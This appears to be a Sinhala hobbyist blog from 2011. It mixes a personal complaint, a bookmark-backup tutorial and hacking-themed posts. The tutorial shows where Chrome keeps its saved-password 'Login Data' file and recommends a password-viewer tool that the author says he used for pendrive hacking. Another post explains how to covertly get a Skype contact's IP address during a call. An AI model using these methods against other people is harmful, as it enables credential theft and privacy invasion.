එකා හිතාන ඇති මම ඉන්ටනෙට් ගැන දන් නැතුව internet use කරනව ඇති කියලා කිකියා හෝගාලා කියවනවා.
මම කීවා අක්කි ඔයා හරියට හොයල බලලා වැරද කරපු කෙනාට බනින්න නිස්කාරනේ මට බනින් නැතුව කියල.ඒ උනත් හෝ ගාලා කියවනවා
මම කීවා එහෙනම් අය්යාට කියලා trace කරලා හරියටම වැරදි කාරයා හොයාහගෙන බනින්න කියල.මොනව කීවත් මේ අම්මන්ඩිගෙ කට නවතින් නැ.
පස්සෙ මම කීවා කොහෙවත් යන වේ@ බ@@@ක් කරපු දේවල් වලට නිකරුනේ මට බනින්න එපා.වැරදි කාරයා හොයාගෙන බනින්න ඔයාගේ වචන ඉතුරු කරගන්න.මම වැරැද්දක් කරානම් මම ස්වෙච්චාවෙන්ම ඉදිරිපත් වෙනවා ඒ උනාට මම කරපු නැති වැරදිවලට නිකරුනේ මාව අල්ල ගන්න එපා කියලා.
ඊට පස්සෙ කියනවා.මම පොඩි එකෙක් නිසා කීවේ හදා ගන්න.පොඩි එවුන්ගේ ඔලු කන මහ එවුන්ට ඉස්සෙල්ල ගහන්න ඕනි කියලා.
මම මොනා කරන්නද එක එක ගැනුන්ගේ තරහ පිරිමහගන්න මම බයිට් වෙන්න ඕනිද කියලා.කෙලින්ම ඒ අම්මන්ඩි බ්ලොක් කරලා.මාක් අය්යාට රිපොර්ට් පාරක් දැම්මා.ඇයි අනේ මම මොන වරදක් කරාටද?  :(
හිත් වේදනාවෙන් ලියුවකි.ඔයාලා වැඩිය හිතන්න එපා  :'(

Monday, August 1, 2011

Back up Bookmarks in chrome & firefox

Bookmark Backup කරමු.
යාලුවනේ අද මම කියල දෙන්න යන්නේ පොඩි හරිම සරල දෙයක්.කොහොමද google chrome වල හා fire fox වල bookmarks back up කරගන්නේ කියලා.මේක කරන්න ගොඩක් ක්‍රම තියෙනවා මම අද ක්‍රම 2ක් විතර කියල දෙන්න තමයි බලාපොරොත්තුව.ඔයාලා මීට වඩා ලේසි ක්‍රමයක් දන්නවනම් සදහනක් දාලායන්න අමතක කරන්න එපා ඒක මට වගේම තවත් අයට උදව්වක් වෙයි.
1.ප්‍රශ්නය : ඇයි bookmark backup කරන්නේ?
හ්ම්ම්ම් මේවගේ ප්‍රශ්නයක් සමහරුන්ට එන්න පුලුවන් .මටනම් ගොඩක් වෙලාවට වෙබ් සයිට්වලට ගිහින් පසුවට බලන්න bookmark කරගන්නවා.( Ctrl හා d අකුර එකවැර එබිමෙන් මෙය සිදුකිරිම කල හැක. )නමුත් අපිට හදිසියේ අපගේ පරිගනකය format කරන්නට හෝ අපගේ වෙබ් බ්‍රව්සරය uninstalle කරන්නට සිදුවුවිට.අප මාස ගනනක් bookmark කර තිබු සියලුම දත්ත  නැතිවි යනවා.එමනිසා ඔබ භාවිතා කරන වෙබ් බ්‍රව්සරය backup කරගැනිම තුලින් එවැනි අවස්ථා මග හරවා ගැනිමට ඔබට පුලුවන්.


2.කොහොමද මේක කරන්නේ?
ක්‍රම කිහිපයක් තියෙනවා අපි එකින් එක බලමු.
Fire fox වල
bookmarks----->show all bookmarks----->import and back up----->back up ඉන්පසු backup file එක save වීමට ස්තානයක් තෝරා දෙන්න.




back up එකක් නැවත ඉස්තාපනය කරගැනිමට restore යන්නෙන් backup file එක save උන තැන  තෝරා දෙන්න.backup files c drive එක තුල නොව වෙන  drive එකක save කරන එක වඩාත් සුදුසුය මොකද format කරත් ඔබට backup ආරක්ශා කරගත හැක.


Chrome වල
රූප අපැහැදිලිනම් එය මත click කරන්න
customize and control google chrome කියන සලකුන උඩ click කරන්න


ඉන් පසු bookmark manager


පසුව export bookmarks යන්නෙන් bookmark save කිරිමට අවශය තැන තෝරා දෙන්න.පෙර පරිදිම import bookmark යන්නෙන් කලින් backup කල bookmark ලබාගත හැක.


එහෙමත් නැතිනම් chrome වල bookmark  user name හා pass word  ලබා ගැනිමට තව ක්‍රමයක් බලමු.
xp වල නම් start------>run එකේ මෙම කොඩ් එක past කර enter කරන්න.
%USERPROFILE%\Local Settings\Application Data\Google\Chrome\User Data


***එවිට පිවිසෙන user data folder එක තුල ඇති default folder එක තුලට පිවිසෙන්න.එය තුල ඇති bookmarks කියනfil එක copy කර තමුන් සාදා ගත් folder එකකට past කරගන්න.




****password ලබාගැනිමට අවශය නම්  Login Dataලෙස ඇති fileඑක copyකර තමුන් සාදාගත් folder එකක past කරගන්න.
ඔබට chrome uninstalle කර නැවත පෙර bookmarks හා password ලබා ගැනිමට අවශය නම් පෙර පරිදිම 
start------>run එකේ ඉහත කොඩ් එක past කර enter කරන්න.


*****පසුව අපි සාදා ගත් බැකප් ෆොල්ඩරය තුල වු bookmark හා login Data file copy කර past කරන්න එවිට overwrite කිරිමට විමසන අතර yes කරන්න. දැන් නැවතත් ඔබගේ bookmarks හා පාස්වර්ඩ් ඔබට භාවිත කර හැක.


xp සදහා   
%USERPROFILE%\Local Settings\Application Data\Google\Chrome\User Data
vista සදහා
%USERPROFILE%\AppData\Local\Google\Chrome\User Data


එහෙමත් නැත්තන් ඔබට පාස්වර්ඩ් ලබාගැනිමට තවත් ක්‍රමයක් ඇත මෙය 7 සදහා සාර්ථක නොවන අතර xp හා vista සදහා යොදා ගත හැක.
මේ සදහා web browser pass view යන  කුඩා software එක භාවිතා කල යුතුය.මා කලින් pendrive එකෙන් හැක් කරන එකටත් මෙය භාවිතා කර ඇත.
මෙතනින් download කරගන්න
එහෙනම් මගේ බ්ලොග් එකට ආවට ඔක්කොටම ස්තුති.තව පොස්ට් එකකින් හමුවෙමු  ජය ශ්‍රි !

Wednesday, May 11, 2011

Ethical Hacking ඕනිද









යාලුවනේ මම අද ඔයාලට දෙන්න යන්නේ VTC [Vertual Traning Company ]එකෙන් හදපු Etical Hacking Video Tute set එකක්.මේකෙ videos 82 ක් තියෙනවා.ගොඩක් අය ලග ඇති මේ tute set එක .මේ tute set එකෙන් discussකරන Topics ටික මම පහලින් දාන්නම්.
01.Introduction
02.Ethical Hacking & Penetration Testing
03.Methodology Overview
04.Reconnaissance (Footprinting)
05.Scanning
06.Port & Service Enumeration
07.Data Enumeration
08.Vulnerability Assessment
09.Penetration Access Compromise Pt.1
10.Penetration Access Compromise Pt.2
11.Evading Defenses & Erasing Tracks
12.Introduction to Hacking Techniques Pt.1
13.Introduction to Hacking Techniques Pt.2
14.Popular Tools
15.Penetration Test Demo
16.Credits
මේවා ගැන තමා මෙහිදි discuss කරන්නෙ.මේ වා තමා ප්‍රදාන මාතෘකා විදිහට තියෙන්නෙ තව උප මාතෘකාත් එක්ක video lesson 82 ක් තියෙනවා.කැමති අය download කරගන්න.මම torrnt එක දාන්නම්
කැමති ලින්ක් එකකින් download කරගන්න.




Link1
















Hack IP Using Skype











කොහොමද යාලුවනේ කලින් මම දාපු Ip Finder එකක් හදන හැටි ගැන පොස්ට් එක බලන්න .ඈති කියලා හිතනවා.මම අද දෙන්න යන්නේ එලකිරිස් සොෆ්ට්වෙයා කැල්ලක්.මේකෙන් පුලුවන් skype chat එකක ඉන්න ගමන් chat කරන අනිත් කෙනාගේ ip එක trace කරගන්න.cmd open කරන් දගලන්න ඕනි නැ.7 වල නම් Task manager එකෙන් බලාගන්න පුලුවන් ඒ උනාට .‍xp වලටනම් බලා ගන්න ගොඩක් අමාරුයි.
ඒ උනාට මේ සොෆ්ට්වෙයාර් කැල්ලෙන් පුලුවන් ලේසියෙන්ම ip එක හොයාගන්න .මාත් අමාරුවෙන් තමාහොයා ගත්තේ.
හරි අපි බලමු කොහොමද මේක කරන්නේ කියලා.

  1. මුලින්ම මේ සොෆ්ට් වෙයාර් එක install කරගන්න.
  2. avast එකේ නම් install කරන්න හදනකොට අහනවා sandboxi run කරන්නද කියලා එහෙම කරලා නම් හොදයි මේක ටෙස්ට් කරන්න ඒ උනාට close  කරාම සොෆ්ට්වෙයාර් එකත් නැ.ඒක නිසා sand boxi නැතුව install කරාට කිසි අවුලක් නැ.
  3. ඊට පස්සේ කාව හරි skype chat එකකට Set කරගන්න.
  4. chat කරන ගමන් යාලුවාට skype call එකක් ගන්න.ඒ අතරතුර ඔයාලා අපි install කරගත්ත.software එක open කරගන්න.
  5. දැන් 




ඊට පස්සේ data speed එකදිහා බලන්න.වැඩියෙන්ම data transfer වෙන ip එක තමා ඔයාලත් එක්ක chat කරන යාලුවා ගේ ip එක . හෙහෙ 
ip එක දන්නවා නම් ඉතින් ගොඩක් ජාති කරන්න පුලුවන්.
එහෙනම් ජයවේවා කිවා ඔයාලා හැමෝටම !
පුලුවන් නම් commnt එකක් දාලා යන්න.
මම පහලින් software එක download කරගන්න ලින්ක් එක දාන්නම්.
pass word: moulderfiles










download link 1